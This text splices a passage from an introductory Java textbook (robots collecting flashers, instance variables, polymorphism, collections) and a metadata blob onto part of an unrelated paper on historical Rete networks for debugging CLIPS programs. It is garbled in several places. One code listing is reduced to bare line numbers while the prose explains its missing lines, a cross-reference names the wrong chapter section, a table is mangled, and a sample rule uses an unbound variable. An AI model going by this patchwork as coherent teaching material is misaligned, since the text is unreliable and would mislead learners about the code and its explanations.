public class Main extends Object {
public static void main(String[] args) {
// This part is the same as lines 6-13 of Listing F-10
TextInput in = new TextInput();
System.out.print(“Number of intersections karel should check: “);
int kNum = in.readInt();
in.readLine();
System.out.print(“Number of intersections jasmine should check: “);
int jNum = in.readInt();
in.readLine();
System.out.print(“Number of intersections pat should check: “);
int pNum = in.readInt();
in.readLine();
karel.collectFlashers(kNum);
karel.turnAround();
jasmine.collectFlashers(jNum);
jasmine.turnAround();
pat.collectFlashers(pNum);
pat.turnAround();
}
}
```
Using `System.out` and a `TextInput` object provides many opportunities for interactions between programs and users. A robot program might ask the user where a robot should be placed or how many things to collect. A banking program might ask the user how much money to transfer between accounts or an e-mail program might ask for the address where a message should be sent. In each of these cases, the program tells the user what information is needed, the user types it in, and then the program reads the information, using the services of an object such as `TextInput`.
This style of interaction is simple and easy to implement, but has been superceded in many programs by windows, dialog boxes, buttons, mice, and so on. We will, in time, learn how to interact with users via a graphical user interface as well.
F.7 Objects That Remember
karel was accidentally moved into a wall and has broken beyond repair. Rather than replacing karel with a new robot, the construction company’s management has decided that jasmine will collect the flashers from both streets. However, because jasmine and pat are now doing significantly different amounts of work, they must be on different maintenance schedules. Management wants each robot to keep track of how many flashers it has collected, printing out the number at the end of each job.
The main method shown in Listing F-13 must be modified to remove lines 19-21 and 31-32, which refer to karel, and replace lines 34-38 with the following. These statements direct jasmine to
- collect the flashers from one street,
- go to karel’s former street and collect flashers there, and,
- print out the number of flashers collected.
pat then collects flashers and also prints out the total number it collected.
```java
jasmine.collectFlashers(jNum);
jasmine.turnLeft();
jasmine.move();
jasmine.turnLeft();
jasmine.collectFlashers(jNum);
jasmine.turnAround();
System.out.print("jasmine collected ");
System.out.println(jasmine.numFlashersCollected());
pat.collectFlashers(pNum);
pat.turnAround();
System.out.print("pat collected ");
System.out.println(pat.numFlashersCollected());
```
Figure F-11 shows the path the robots take when this program is run. It also shows the console window displaying the number of flashers each robot collected.
This program requires two changes to the Collector class. First, it must be modified to remember the number of flashers collected. Second, a query, numFlashersCollected, must be added to retrieve the number so it can be printed.
At first, we may think that all we need is a temporary variable to remember the number of flashers a robot has collected. This will not work, however, because a temporary variable exists only as long as the service containing it executes – then the variable and the value it contained are gone. jasmine, however, will execute collectFlashers twice before we ask for the number of flashers collected. A temporary variable inside collectFlashers could not keep a running total across both uses of the service.
An instance variable, however, will do what we need. In many ways, an instance variable is like a temporary variable. Both remember information such as a number. Both kinds of variables can have the information they store changed, perhaps by adding one to the number already stored there. The information stored in both kinds of variables can be printed on the console or passed as a parameter to a service.
There are, however, two crucial differences. First, a temporary variable is temporary. It only lasts as long as the method containing it; sometimes even less. An instance variable, on the other hand, lasts as long as the object lasts. An instance variable in jasmine will be created when the object is created and will continue to remember information until jasmine is no longer needed.
Second, a temporary variable can only be used in the method where it is created. An instance variable may be used anywhere in the class containing it. Each object created from the class will have its own instance variable. jasmine will have one instance variable and pat will have another. This duplication enables jasmine and pat to each count the flashers they have picked up, each completely independent from the other.
These three properties are crucial to solving the problem of remembering how many flashers have been collected. First, because instance variables last as long as the object, each time collectFlashers is called the count can continue from where it left off the previous time. Second, because instance
variables can be used in any method in the class, we can write a separate
method that returns the current value of the instance variable. Third, because
each object has its own instance variable, jasmine and pat can each keep
track of their own work.
Listing F-14 shows how to use an instance variable named
flasherCount to remember how many flashers have been collected. The
only differences between Listing F-14 and the previous version in Listing F-
12 are shown in bold.
<table>
<thead>
<tr>
<th>Listing F-14: Modifications to Collector to remember the number of flashers collected.</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
</tr>
<tr>
<td>2</td>
</tr>
<tr>
<td>3</td>
</tr>
<tr>
<td>4</td>
</tr>
<tr>
<td>5</td>
</tr>
<tr>
<td>6</td>
</tr>
<tr>
<td>7</td>
</tr>
<tr>
<td>8</td>
</tr>
<tr>
<td>9</td>
</tr>
<tr>
<td>10</td>
</tr>
<tr>
<td>11</td>
</tr>
<tr>
<td>12</td>
</tr>
<tr>
<td>13</td>
</tr>
<tr>
<td>14</td>
</tr>
<tr>
<td>15</td>
</tr>
<tr>
<td>16</td>
</tr>
<tr>
<td>17</td>
</tr>
<tr>
<td>18</td>
</tr>
<tr>
<td>19</td>
</tr>
</tbody>
</table>
The instance variable flasherCount is declared at line 4, inside the class,
but outside of all the methods. It is declared just like a temporary variable
except for the keyword private at the beginning of the line.
flasherCount starts out with a value of 0 when the robot object is created. However, just after a flasher is picked up at line 22 the instance variable is incremented. Incrementing flasherCount is very similar to incrementing the temporary variable at line 15 – except that we use the keyword this to emphasize that flasherCount is something that belongs to the object, much like move, turnLeft, and collectFlashers belong to the object.
The code at lines 32-34 provide a query answering the question of how many flashers the robot has collected so far. It is like other methods except that it says what kind of answer it returns – an integer, abbreviated int. It also includes an instruction to return the answer – the value contained in flasherCount – to the client that called the query.
There are many times when an object may want to remember information for a long time. A robot may want to remember how far it has traveled or the location of a Thing representing a pot of gold. An object representing a bank account will need to remember the balance for as long as it exists. An Employee object should remember the employee’s starting date and annual salary, no matter which of many possible services is being executed – or even if no service is being executed at the moment.
On the other hand, if the information is only needed in a single method, an instance variable is more powerful than is needed. A temporary variable is likely a better choice.
F.8 The Same, But Different
The paving project is nearly complete. Workers have put up streetlights on a number of the intersections; flashers remain on some of the rest (see Figure F-12). jasmine and pat have been moved to a different site and three new robots (sam, migel, and laura) are being used to turn the lights off each morning – both the flashers and the streetlights. sam, migel, and laura are instances of Extinguisher robots that include a service named turnLightsOff. Like collectFlashers, turnLightsOff has a parameter that says how many intersections the robot should visit.
To turn off a flasher, turnLightsOff could have code like this:
```java
Flasher f = (Flasher)this.examineThing(
Predicate.aFlasher);
f.turnOff();
```
this.examineThing instructs this robot to examine the intersection it occupies for a Thing. In particular, the parameter, Predicate.aFlasher, tells it to look for a flasher. If the robot finds a flasher on the intersection, it assigns it to the temporary variable, f.
Similar code could be used to turn off a streetlight, except that we have to specify that we are interested in Streetlight objects.
```java
Streetlight s =
(Streetlight)this.examineThing(
Predicate.aStreetlight);
s.turnOff();
```
There is one restriction on this code. If the intersection does not actually have a streetlight, the program will produce a run-time error when it tries to turn off the non-existent streetlight. One way to fix this problem is to use an if statement to only execute this code if the robot is beside a streetlight.
These ideas can be combined to create a `turnLightsOff` method. It, together with a helper method, are shown in Listing F-15.
The `turnLightsOff` method is very, very similar to the `collectFlashers` method. The difference is what happens on each intersection. Instead of calling `pickFlasherIfPresent`, `turnLightsOff` calls the method `turnLightsOffHere`.
When the `turnLightsOffHere` method executes, it first checks if the intersection has a flasher. If so, the robot gets the flasher and calls its `turnOff` method. Then the robot checks for a streetlight. If there is a streetlight, the robot gets it and calls its `turnOff` method.
It is no coincidence that flashers and streetlights are both turned off with a method named turnOff. Recall from Section G.1 that we extended the Robot class to create a new kind of robot, a Collector. A Collector robot had all of the methods a regular Robot has: move, pickThing, putThing, and so on. It was also customized to include a new method, collectFlashers.
Flasher and Streetlight both extend the class Light. The Light class contains the methods turnOn and turnOff. The Flasher and Streetlight classes both inherit these methods. Just as a Collector robot can move, thanks to the move method inherited from Robot, a Flasher and a Streetlight can be turned on or off, thanks to the turnOn and turnOff methods inherited from Light.
Looking at these classes another way, Flasher and Streetlight are both a kind of Light. Therefore, they must be able to be turned on and off.
This yields an interesting idea. Perhaps we can instruct the robot to examine the intersection for a light. Not a flasher, in particular, nor a streetlight in particular, but just a light.
Light lite = (Light)this.examineThing(Predicate.aLight);
lite.turnOff();
This, in fact, does work. The eight lines of code in the turnLightsOffHere method, shown in Listing F-15, can be cut to just four lines, as shown in Listing F-16.
In some ways, it is surprising that this code works. After all, there are differences between streetlights and flashers. When a Streetlight is on, it just shines gently. When a flasher is on, it flashes insistently. It seems reasonable that these differences in behavior would result in differences in the turnOff methods – a streetlight would turn itself off differently than a flasher would turn itself off.
This is the case. The definition of turnOff for a Streetlight is
public void turnOff()
{ this.setIcon(this.offIcon); }
while the definition of turnOff for a Flasher is
public void turnOff()
{ FlasherIcon fi = (FlasherIcon)this.getIcon();
fi.stop();
this.on = false; }
Java allows a class to override methods in the class it extends. Flasher can replace the turnOff method inherited from Light with its own version, as can Streetlight. Then, when the statement
lite.turnOff();
is executed, lite might be a Flasher object or lite might be a Streetlight object. But it doesn’t matter. Each object will use its own turnOff method. A Flasher will turn off one way; a Streetlight will turn off another way. They are the same – they both turn off – but they are
also different – they turn off in different ways. This concept of having the same service behave differently, depending on the class, is called polymorphism.
Polymorphism is useful when you have different kinds of objects that need to perform variations of the same basic action. For example, you might have two different kinds of dancing robots. A left-dancing robot moves to the left, forward, and then back to the right when sent the move message. A right-dancing robot moves to the right, forward, and then to the left when it moves. Both respond to the move message, but move differently.
As another example, consider an Employee class that is extended in two different ways: HourlyEmployee and SalariedEmployee. Every Employee should have a calcWages method, but HourlyEmployee and SalariedEmployee calculate the answer differently. Fortunately, the code
```java
Employee e = (Employee)this.getNextEmployee();
e.calcWage();
```
will use the correct calculation no matter if e is an HourlyEmployee or a SalariedEmployee.
Or, consider programs such as Windows Media Player or RealPlayer that can play downloaded music or videos. If the user selects a music file, the play method in the Music class is executed. If the user selects a video file, the play method in the Video class is executed. This could be implemented by having Music and Video both extend a class named Media, which has a play method. Then, no matter what kind of media the user has selected, the lines
```java
Media selected = (Media)this.getUsersSelection();
selected.play();
```
will cause the right play method to be executed. Thanks to polymorphism, each object can execute a method in an appropriate manner without the client even needing to know what kind of object it is. Polymorphism allows the code calling a method to treat objects in the same way, even if the objects belong to different classes.
### F.9 Collections
The original paving job is finished and the construction company has landed another contract. This time the contract is much larger – a huge subdivision consisting of fifty streets. As before, robots are required to collect the flashers from the intersections each morning.
Working with fifty robots on fifty streets raises two issues. First is the tedium of coming up with the names for fifty robots. Second is the large amount of code that is exactly the same except for the name of the robot involved.
Using only the techniques we have learned so far, the main program would have to be written as shown in Listing F-17.
Listing F-17: A naïve program directing 50 robots to collect flashers on 50 streets.
```java
import becker.robots.*;
public class Main{
public static void main(String[] args)
{
ConSite site = new ConSite();
Collector worker_0 =
new Collector(site, 1, 1, Directions.EAST);
Collector worker_1 =
new Collector(site, 1, 2, Directions.EAST);
Collector worker_2 =
new Collector(site, 1, 3, Directions.EAST);
...
Collector worker_48 =
new Collector(site, 1, 49, Directions.EAST);
Collector worker_49 =
new Collector(site, 1, 50, Directions.EAST);
CityFrame frame = new CityFrame(site);
worker_0.collectFlashers();
worker_0.turnAround();
worker_1.collectFlashers();
worker_1.turnAround();
worker_2.collectFlashers();
worker_2.turnAround();
...
worker_48.collectFlashers();
worker_48.turnAround();
worker_49.collectFlashers();
worker_49.turnAround();
}
}
```
Using numbers in the names of the robots makes the similarity of many lines obvious. One might wonder if we can make use of all that similarity.
If fact, we can. There are various ways to collect many objects, such as robots, together. The result is called a collection. Collections are used by giving the name of the collection together with a number. For example, suppose the collection is named workers and already contains the fifty robots. Then the fifth robot could be told to collect flashers and turn around with the following code:
Collector worker = (Collector)workers.get(5);
worker.collectFlashers();
worker.turnAround();
This doesn’t seem to be useful until we realize that the 5 can be replaced with a variable. If we put these three lines inside a loop that counts from 0 to 49, then 50 robots will collect flashers and then turn around! All with just the following 7 lines of code (instead of the 100 required in Listing F-17).
```java
int workerNum = 0;
while (workerNum < 50)
{ Collector worker = (Collector)workers.get(workerNum);
worker.collectFlashers();
worker.turnAround();
workerNum = workerNum + 1;
}
```
The beauty of this approach is that 1,000 robots could be told to collect flashers with the same seven lines of code. Only the 50 in the second line would need to change.
Collections are often used in programs. Each robot uses a collection to implement its “backpack” and the City class uses a collection to manage all the things it contains — robots, walls, flashers, and so on. Programs used at a bank use collections to keep track of all the different Account objects and payroll programs use collections of Employee objects. Word processors use collections to store many Paragraph objects and all the words in the spelling checker’s dictionary.
Any time a program must use many similar objects or similar pieces of information, a collection is probably being used.
|
{"Source-Url": "http://www.programajama.com/courses/bit115/Becker/BeckerBook/LayOfTheLand.pdf", "len_cl100k_base": 13292, "olmocr-version": "0.1.53", "pdf-total-pages": 35, "total-fallback-pages": 0, "total-input-tokens": 78616, "total-output-tokens": 15338, "length": "2e13", "weborganizer": {"__label__adult": 0.00046753883361816406, "__label__art_design": 0.0002465248107910156, "__label__crime_law": 0.0002949237823486328, "__label__education_jobs": 0.002147674560546875, "__label__entertainment": 6.002187728881836e-05, "__label__fashion_beauty": 0.00016009807586669922, "__label__finance_business": 0.00020456314086914065, "__label__food_dining": 0.00043702125549316406, "__label__games": 0.0007677078247070312, "__label__hardware": 0.00067901611328125, "__label__health": 0.0002758502960205078, "__label__history": 0.0002168416976928711, "__label__home_hobbies": 0.00011032819747924803, "__label__industrial": 0.0003592967987060547, "__label__literature": 0.00031828880310058594, "__label__politics": 0.00021755695343017575, "__label__religion": 0.0005054473876953125, "__label__science_tech": 0.001567840576171875, "__label__social_life": 0.0001067519187927246, "__label__software": 0.002941131591796875, "__label__software_dev": 0.98681640625, "__label__sports_fitness": 0.0003266334533691406, "__label__transportation": 0.0006833076477050781, "__label__travel": 0.00023758411407470703}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 58048, 0.01974]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 58048, 0.90128]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 58048, 0.89631]], "google_gemma-3-12b-it_contains_pii": [[0, 1714, false], [1714, 3249, null], [3249, 4715, null], [4715, 7060, null], [7060, 8753, null], [8753, 10318, null], [10318, 11419, null], [11419, 13240, null], [13240, 14698, null], [14698, 16503, null], [16503, 17265, null], [17265, 19499, null], [19499, 21365, null], [21365, 22941, null], [22941, 25128, null], [25128, 25574, null], [25574, 27215, null], [27215, 29459, null], [29459, 31237, null], [31237, 32838, null], [32838, 34239, null], [34239, 35960, null], [35960, 37441, null], [37441, 39423, null], [39423, 41166, null], [41166, 43376, null], [43376, 44897, null], [44897, 46335, null], [46335, 48815, null], [48815, 50010, null], [50010, 51085, null], [51085, 52525, null], [52525, 54941, null], [54941, 56680, null], [56680, 58048, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1714, true], [1714, 3249, null], [3249, 4715, null], [4715, 7060, null], [7060, 8753, null], [8753, 10318, null], [10318, 11419, null], [11419, 13240, null], [13240, 14698, null], [14698, 16503, null], [16503, 17265, null], [17265, 19499, null], [19499, 21365, null], [21365, 22941, null], [22941, 25128, null], [25128, 25574, null], [25574, 27215, null], [27215, 29459, null], [29459, 31237, null], [31237, 32838, null], [32838, 34239, null], [34239, 35960, null], [35960, 37441, null], [37441, 39423, null], [39423, 41166, null], [41166, 43376, null], [43376, 44897, null], [44897, 46335, null], [46335, 48815, null], [48815, 50010, null], [50010, 51085, null], [51085, 52525, null], [52525, 54941, null], [54941, 56680, null], [56680, 58048, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 58048, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 58048, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 58048, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 58048, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 58048, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 58048, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 58048, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 58048, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 58048, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 58048, null]], "pdf_page_numbers": [[0, 1714, 1], [1714, 3249, 2], [3249, 4715, 3], [4715, 7060, 4], [7060, 8753, 5], [8753, 10318, 6], [10318, 11419, 7], [11419, 13240, 8], [13240, 14698, 9], [14698, 16503, 10], [16503, 17265, 11], [17265, 19499, 12], [19499, 21365, 13], [21365, 22941, 14], [22941, 25128, 15], [25128, 25574, 16], [25574, 27215, 17], [27215, 29459, 18], [29459, 31237, 19], [31237, 32838, 20], [32838, 34239, 21], [34239, 35960, 22], [35960, 37441, 23], [37441, 39423, 24], [39423, 41166, 25], [41166, 43376, 26], [43376, 44897, 27], [44897, 46335, 28], [46335, 48815, 29], [48815, 50010, 30], [50010, 51085, 31], [51085, 52525, 32], [52525, 54941, 33], [54941, 56680, 34], [56680, 58048, 35]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 58048, 0.03026]]}
|
olmocr_science_pdfs
|
2024-12-06
|
2024-12-06
|
5a69f39cd2386fc2b768c0b17ad6a73859db22ff
|
Abstract. To debug a CLIPS program, certain 'historical' information about a run is needed. It would be convenient for system builders to be able to ask questions requesting such information. For example, system builders might want to ask why a particular rule did not fire at a certain time, especially if they think that it should have fired then, or they might want to know at what periods during a run a particular fact was in working memory. It would be less tedious to have such questions directly answered, instead of having to rerun the program one step at a time or having to examine a long trace file.
This paper advocates extending the Rete network used in implementing CLIPS by a temporal dimension, allowing it to store 'historical' information about a run of a CLIPS program. We call this extended network a historical Rete network. To each fact and instantiation are appended time-tags, which encode the period(s) of time that the fact or instantiation was in effect. In addition, each Rete network memory node is partitioned into two sets: a current partition, containing the instantiations currently in effect, and a past partition, containing the instantiations which are not in effect now, but which were earlier in the current run. These partitions allow the basic Rete network operation to be surprisingly unchanged by the addition of time-tags and the resulting effect that no-longer-true instantiations now do not leave the Rete network.
We will discuss how historical Rete networks can be used for answering questions that can help a system builder detect the cause of an error in a CLIPS program. Moreover, the cost of maintaining a historical Rete network is compared with that for a classical Rete network. We will demonstrate that the cost for assertions is only slightly higher for a historical Rete network. The cost for handling retractions could be significantly higher; however, we will show that by using special data structures that rely on hashing, it is also possible to implement retractions efficiently.
I. INTRODUCTION
One of the activities of a system builder developing any kind of software is debugging, "the process of locating, analyzing, and correcting suspected faults" ([IEEE 1989], p. 15). So, first, the system builders notice, one way or another, that there is a manifestation of an error in the program. Then, they debug by finding, and then correcting, the cause(s) of that particular error. In a forward-chaining rule-based language such as CLIPS ([Giarratano 1989], (COSMIC 1989)), a program's data-driven execution affects the process of debugging.
In a CLIPS program, data changes determine what happens next. One of the rules whose left-hand-side conditions are all satisfied will be chosen to have its right-hand-side actions executed. Those actions may change working memory, causing some previously-unsatisfied rules to now be satisfied, and vice versa. So, the choice of which rule to fire determines which rules will have a chance to fire next, and so affects what can happen next. To debug such a program, the system builders need detailed information about what happened during its run, including the order in which rules were executed, and when certain data were (or were not) in working memory. This historical information about a run will be...
necessary to discover why the program executed as it did.
Particularly for large CLIPS programs, system builders armed only with those tools currently provided have a tedious job ahead. CLIPS allows one to run a program one rule-firing at a time (or, it allows one to single-step through a program), and to check what is in memory or in the agenda, the ordered list of rules currently eligible to fire. CLIPS can also be directed to display a trace of rule-firings and/or of working memory changes for system builder use. So, to find out, for example, when a fact was in working memory, we can carefully examine a possibly-long trace of assertions to and retractions from working memory, or we can single-step through the program, and ask to see the current list of facts when we reach various points at which we suspect that the fact is true. To find out why a rule did not fire at a particular time, we can single-step through the program up to that time, and then try to determine, from the agenda and working memory contents, why this rule did not fire then. We can find out such information using the current tools, but we may also easily overlook details in the sheer volume and monotony of the data.
CLIPS' current debugging tools are not very different from those found for other, similar forward-chaining rule-based languages. Evidence that these tools are not sufficient can be found in the current research trying to ease the debugging of large forward-chaining programs. (Domingue and Eisenstadt 1989) presents a graphics-based debugger, while (Barker and O'Connor 1989), (Jacob and Froscher 1990), (Eick et al. 1989), and (Eick 1991) suggest changes to rule-based languages, such as the addition of rule-sets, that might, among other goals, ease debugging, changing, and maintaining rule-based programs.
We would like to explore a slightly different approach to debugging: how explanation can be used in debugging CLIPS programs. The explanation subsystem envisioned will allow system builders to ask questions on the top level of CLIPS about the latest run of a program, which the system then answers, instead of requiring the system builders to run the program again, single-stepping through it, or to pore over the system trace. This explanation, designed with the problems of forward-chaining rule-based program debugging in mind, would be a useful addition to the current debugging facilities provided by CLIPS.
Many questions useful for debugging deal with the aforementioned historical details of a run. For example, system builders might ask what fired rule's right-hand-side actions contributed a particular fact to working memory, allowing it to trigger some other rule. They might ask which fired rules needed a particular fact to be true for their left-hand-side conditions to be satisfied; this gives them an idea of that fact's impact. They might ask why a particular rule did not fire at a certain time, especially if they think that it should have fired then. These questions can be answered using the current CLIPS facilities, by single-stepping through a run or by studying a trace, but the tedium would be reduced if the questions could be directly answered instead. However, one of the first hurdles to answering such questions is determining how to store and maintain a run's historical information.
CLIPS uses an inference network to efficiently match left-hand-side (or LHS) rule conditions to facts; in particular, it uses the Rete algorithm ((Forgy 1982), (Scales 1986)) for this matching. Basically, in the Rete algorithm, a network of all the LHS conditions from all the rules is built, which includes tests both for each LHS condition appearing in any rule, and for certain combinations of conditions within rules. When a fact matches a LHS condition, an instantiation — indicating that this condition is satisfied by this fact — is stored in the network; instantiations are also stored for combinations of LHS conditions satisfied by sets of facts. A rule instantiation represents a collection of facts that satisfies all of the rule's LHS conditions. Then, as each new fact is asserted, it is sent through the network. As a result of this propagation, rules may become eligible to be fired, if this fact's assertion causes instantiations of those rules to be created. Likewise, rule instantiations may be removed because of this fact's assertion, if the rule contains a LHS condition requiring that this fact not be true. When facts are retracted from working memory, that is also propagated through the network, causing the removal of instantiations including the now-retracted fact.
In this paper, a generalization of the Rete network, called a historical Rete network, is proposed that allows the storing and maintenance of historical information for a single
run of a CLIPS program. We have two main objectives in modifying Rete for this purpose: CLIPS programs using the modified network must still run almost as efficiently as before the modifications, so that run-time operation during program development is not overly impeded, and the modified network should allow reasonable maintenance and retrieval of a program run's historical information. Since the Rete network implements rule instantiations, it is feasible to 'tag' condition and rule instantiations with when they occurred during a run. Including this information within the network will allow us to design top-level explanation facilities that can more easily and efficiently answer 'historical' questions about a run, and thus ease the task of debugging for system builders. Storing and maintaining this information is just one of several components in providing such explanation, but it is a necessary and important aspect.
The rest of the paper will be organized as follows. Section 2 briefly introduces the Rete algorithm, then discusses our use of rule-firings as the basis for time, and then describes how time-tags, along with current and past partitions, can be used to store CLIPS program run history. Since some questions that a system builder might ask would involve knowing what the agenda looked like at a certain time, section 3 covers how an agenda copy may be reconstructed on demand. Section 4 then briefly describes how historical information about a program run may be retrieved in the context of gathering data for answering several different kinds of questions useful for debugging. Finally, section 5 concludes the paper.
II. MODIFICATIONS TO THE RETE NETWORK
A. Introduction to Rete Networks
Before discussing the necessary structural changes, we will briefly review 'normal' Rete networks. (For a fuller description, see (Forgy 1982), (Scales 1986), and (Gupta 1987).) In a Rete network, there are three kinds of memory nodes: alpha nodes, beta nodes, and production nodes. (For simplicity, 'node' will stand for test nodes along with their corresponding memory.) There is an alpha node for each LHS condition; the alpha node stores an instantiation for each fact matching this condition. A beta node contains instantiations representing two or more consistently-satisfied LHS conditions from a particular rule (or rules), and a production node holds instantiations that satisfy all of the LHS conditions of a rule.
In a Rete network, two alpha nodes representing rule conditions are joined into a beta node, containing instantiations that consistently represent both conditions being true. Then that beta node is (typically) joined with another alpha node into another beta node, containing instantiations that consistently represent these three conditions being true, and so on until all of a rule's LHS conditions have been represented, at which point, instead of leading to a beta node, a beta node and alpha node are joined into a production node, containing 'complete' rule instantiations that are eligible to fire. And, when it is being built, as conditions are added to the network, each condition appears in the network only once; if it is used in several rules, then that alpha node has a number of successors, and likewise, if a set of conditions appears in several rules, the section of the Rete network leading to a beta node representing that set of conditions may also be shared among several rules.
Figure 1 shows a simplified Rete network for a single CLIPS rule, rule-13, given in Table 1. (We will use facts, instead of fact-ids, in instantiations in most of the figures, for greater clarity.) Each of the three LHS conditions in rule-13 has a corresponding alpha node that tests for matches and stores an instantiation of each matching fact. So, we see in Figure 1 that working memory fact (p 1 3) matches rule-13's LHS condition (p ?X ?Y), that fact (q 3 5) matches (q ?Y ?Z), and that fact (r 1 7) matches (r ?X ?Q). The first two conditions are then joined into a beta node, which tests if any of the facts matching those two conditions are compatible, and then stores any combinations passing the test. (p 1 3) and (q 3 5) both match their respective conditions with ?Y = 3, so an instantiation for that pair is stored in the beta node. Then, that beta node is joined with the remaining condition, and since
this is the last condition, any instantiations resulting from these compatibility tests will be instantiations for rule-13, stored in a production node. The variable \(?X\) is 1 in both the beta node's only instantiation and in \((r \ ?X \ ?Q)\)'s only instantiation, so they can be combined into a compatible instantiation for the entire rule, and so an instantiation is stored in rule-13's production node.
---
### Table 1. A CLIPS rule
<table>
<thead>
<tr>
<th>Rule 13</th>
<th>(alpha node)</th>
<th>(beta node)</th>
<th>(production node)</th>
</tr>
</thead>
<tbody>
<tr>
<td>((p \ ?X \ ?Y))</td>
<td>((g \ ?Y \ ?Z))</td>
<td>((r \ ?X \ ?Q))</td>
<td></td>
</tr>
<tr>
<td>((p \ 1 \ 3))</td>
<td>((g \ 3 \ 5))</td>
<td>((r \ 1 \ 7))</td>
<td></td>
</tr>
</tbody>
</table>
---
### Figure 1. A 'regular' Rete network
In general, when a fact is asserted, it is added to the working memory element (or wme) hash table, which stores all the facts currently in working memory. Each wme hash table entry includes pointers to all of the LHS conditions (or, alpha nodes) in the Rete network that match this fact; these pointers allow us to avoid another search of all the conditions if the fact is later retracted. The newly-asserted fact is then compared to every alpha node, and, if the fact matches that LHS condition, an instantiation is stored in the alpha node, and a pointer to this alpha node is stored in the fact's wme hash table entry. We then visit all of that alpha node's successors, seeing if the new instantiations in a node result in new consistent instantiations at the succeeding node. Any new rule instantiations added to production nodes are added to the agenda.
CLIPS uses an agenda, a priority queue containing the currently-eligible rule instantiations in the order that they should be fired (if they stay on the agenda long enough); the one on top of the agenda will be the next chosen to fire. An agenda of size \(n\) does not necessarily display the next \(n\) rules that will be fired, however, because each rule-firing has the potential to change working memory, causing rule instantiations to join and to be deleted from the agenda. CLIPS uses the following conflict resolution strategy (COSMIC 1989):
1. The instantiations are ordered by the salience, or priority, of the rules involved; the instantiation with the highest salience is on top of the agenda.
2. If instantiations have the same salience, then the one which became true most
recently is preferred over earlier ones by being placed nearer to the top of the agenda.
B. Time-Related Considerations
Before we can modify Rete to store historical information, we need to decide on some time scale, so that we can store the data needed to determine when and in what order rules fired, and when facts were (and were not) in working memory. To further facilitate debugging, we would like a time-unit that is central to CLIPS program operation. Conceptually, rule-firings are the major units of action in a CLIPS program. Computations are done when a rule fires, and the computations performed are those of the selected rule.
The Transparent Rule Interpreter (TRI), a graphical debugger for forward-chaining rule based languages described in (Domingue and Eisenstadt 1989), uses rule-firings as the 'time' scale in its 'musical score' framework for graphically representing forward-chaining execution. Also, note that the existing debugging aids within CLIPS are rule-firing based. As previously mentioned, CLIPS allows system builders to run a program one rule-firing at a time, in order to more closely examine its execution while debugging; the single step in this single-stepping process is one rule-firing. And, the CLIPS (`run') command concludes by printing out how many rules have fired during the program execution, and if one chooses to display rule-firing information during program execution, then each is numbered by its order of occurrence within the run. The rule-firings are considered a measure of how much or how little has occurred. Therefore, it is quite natural to use rule-firings as a time basis. A counter starts at zero at the beginning of each run and is incremented with each rule-firing. This also has the useful feature of being comparable between runs; for example, running the same program with the same data twice, the fifth rule to fire does so at the same 'time' in both runs — at time counter value five — which can make it easier to compare and contrast, for example, two runs of the same program using slightly different sets of facts.
C. Historical Rete Networks
Historical Rete networks, proposed by this paper, differ from classical Rete networks in two major respects: each instantiation stored within the network has a time-tag, which gives the period(s) of time that the instantiation was in effect, and each memory node has its contents partitioned into two sets: a current partition, containing all instantiations currently in effect, and a past partition, containing all instantiations in effect earlier in this run.
A time-tag is a set of one or more intervals stored with a fact or instantiation, which gives the time period(s) during a run that the fact or instantiation was in effect. For brevity, we will use 'true' to describe a fact in working memory, an instantiation representing a condition or conditions satisfied by working memory, and an eligible rule instantiation. (Note that, because of refraction ((Brownston et al. 1985), pp. 62-63), a rule instantiation that fires becomes ineligible, even if its RHS actions do not cause any of its LHS conditions to become unsatisfied, until at least one of its facts is retracted and asserted again.)
This time-tag is different from the time tag mentioned in (Brownston et al. 1985), p. 43, because that time tag is associated just with facts, and not also with instantiations as ours is, and it consists of only one integer, representing when that fact joined working memory or was last modified. The time-tags we use store more information, about both facts and instantiations. An interval is a component (x y) in a time-tag, in which x was the time when that fact or instantiation became true and y was the time when it became no longer true — when the fact was retracted from working memory, when one or more conditions represented by an instantiation were no longer satisfied, or, for a rule instantiation, when it left the agenda. An open interval indicates that the fact or instantiation is still true; we write such an interval as (x *).
Time-tags are found in the wme hash table and the historical Rete network. Each wme hash table entry now also includes the time-tag for that fact. When a fact is retracted from working memory, its entry is not removed from the table; instead, the open interval
241
in its time-tag is closed with the current time. So, the wme hash table stores all the facts that are or have been in working memory during this program run. We can tell if a fact is currently true by simply seeing if the last interval of its time-tag is open. (The wme hash table entry should probably also store all of the fact-ids that a fact has had during a run.)
The time-tags give the time period(s) during a run that a fact or instantiation was true, and so they are part of the run's historical information. The partitions, on the other hand, serve a very different purpose: they allow the basic Rete network operation to be surprisingly unchanged by the addition of time-tags and the resulting effect that instantiations do not leave the historical Rete network. (Instantiations that no longer hold have their time-tags' intervals closed, but those instantiations are not actually removed from the network.) If we keep a memory node's no-longer-true instantiations in a past partition, then the instantiations in each memory node's current partition are exactly those that would appear in the corresponding 'normal' Rete network memory node. This, then, allows most historical Rete network operations to take place as in a 'normal' Rete network: the actions that involve all instantiations in normal Rete now involve all instantiations in current partitions only in historical Rete.
```
(defrule rule-1
(q ?Y ?Z)
(r ?X ?W)
=>
(assert (r ?X ?Z))
(retract ?p.addr))
(defrule rule-2
(r ?X ?W)
(s ?Z ?X)
=>
(assert (q = (*?W ?X) ?Z)))
```
